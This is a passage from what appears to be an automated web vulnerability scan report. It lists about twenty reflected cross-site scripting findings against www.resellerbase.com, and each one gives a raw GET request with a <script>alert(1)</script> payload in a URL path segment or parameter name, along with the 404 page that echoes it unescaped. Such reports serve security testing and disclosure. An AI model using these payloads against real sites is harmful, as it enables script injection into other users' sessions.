X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...&Submit3=Search&opt=2af9ff<a>58bf6ba94b6 was not found on this server.</p>
...[SNIP]...

2.600. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 992e5<script>alert(1)</script>35438db10d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication992e5<script>alert(1)</script>35438db10d7/mobile-content/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication992e5<script>alert(1)</script>35438db10d7/mobile-content/themes/ was not found on this server.</p>
...[SNIP]...

2.601. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4840a<script>alert(1)</script>1838b5cc10e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content4840a<script>alert(1)</script>1838b5cc10e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content4840a<script>alert(1)</script>1838b5cc10e/themes/ was not found on this server.</p>
...[SNIP]...

2.602. http://www.resellerbase.com/communication/mobile-content/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ac6d<script>alert(1)</script>ba8151a5693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes3ac6d<script>alert(1)</script>ba8151a5693/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes3ac6d<script>alert(1)</script>ba8151a5693/ was not found on this server.</p>
...[SNIP]...

2.603. http://www.resellerbase.com/communication/mobile-content/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bad23<script>alert(1)</script>d3848b6d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/?bad23<script>alert(1)</script>d3848b6d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/?bad23<script>alert(1)</script>d3848b6d2=1 was not found on this server.</p>
...[SNIP]...

2.604. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb977<script>alert(1)</script>c548d66f9da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationfb977<script>alert(1)</script>c548d66f9da/mobile-content/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationfb977<script>alert(1)</script>c548d66f9da/mobile-content/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.605. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dab61<script>alert(1)</script>c1efcc801d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentdab61<script>alert(1)</script>c1efcc801d1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentdab61<script>alert(1)</script>c1efcc801d1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.606. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aac85<script>alert(1)</script>b366a9e023a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themesaac85<script>alert(1)</script>b366a9e023a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themesaac85<script>alert(1)</script>b366a9e023a/kosmos/ was not found on this server.</p>
...[SNIP]...

2.607. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a25af<script>alert(1)</script>d7844d18ae9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosa25af<script>alert(1)</script>d7844d18ae9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosa25af<script>alert(1)</script>d7844d18ae9/ was not found on this server.</p>
...[SNIP]...

2.608. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90155<script>alert(1)</script>338e88faecb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/?90155<script>alert(1)</script>338e88faecb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/?90155<script>alert(1)</script>338e88faecb=1 was not found on this server.</p>
...[SNIP]...

2.609. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 644ed<script>alert(1)</script>51d519dc4b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication644ed<script>alert(1)</script>51d519dc4b1/mobile-content/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication644ed<script>alert(1)</script>51d519dc4b1/mobile-content/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.610. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e5e3<script>alert(1)</script>4b0fc55372e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content3e5e3<script>alert(1)</script>4b0fc55372e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content3e5e3<script>alert(1)</script>4b0fc55372e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.611. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51e14<script>alert(1)</script>0e323ddf36a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes51e14<script>alert(1)</script>0e323ddf36a/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes51e14<script>alert(1)</script>0e323ddf36a/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.612. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18866<script>alert(1)</script>a74b2231622 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos18866<script>alert(1)</script>a74b2231622/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos18866<script>alert(1)</script>a74b2231622/images/ was not found on this server.</p>
...[SNIP]...

2.613. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27e50<script>alert(1)</script>2aaa840d106 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images27e50<script>alert(1)</script>2aaa840d106/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images27e50<script>alert(1)</script>2aaa840d106/ was not found on this server.</p>
...[SNIP]...

2.614. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2b1f<script>alert(1)</script>2add2188c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmos/images/?f2b1f<script>alert(1)</script>2add2188c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmos/images/?f2b1f<script>alert(1)</script>2add2188c0=1 was not found on this server.</p>
...[SNIP]...

2.615. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30b7f<script>alert(1)</script>ea0f6779b36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication30b7f<script>alert(1)</script>ea0f6779b36/mobile-content/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication30b7f<script>alert(1)</script>ea0f6779b36/mobile-content/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.616. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 585ed<script>alert(1)</script>ec319b26f71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content585ed<script>alert(1)</script>ec319b26f71/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content585ed<script>alert(1)</script>ec319b26f71/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.617. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348f2<script>alert(1)</script>601343c2571 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes348f2<script>alert(1)</script>601343c2571/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes348f2<script>alert(1)</script>601343c2571/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.618. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4fd9<script>alert(1)</script>beae84c0d64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/kosmosb4fd9<script>alert(1)</script>beae84c0d64/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/kosmosb4fd9<script>alert(1)</script>beae84c0d64/images/rating/ was not found on this server.</p>
...[SNIP]...

2.619. http://www.resellerbase.com/communication/mobile-content/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c88c3<script>alert(1)</script>05eb52630bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

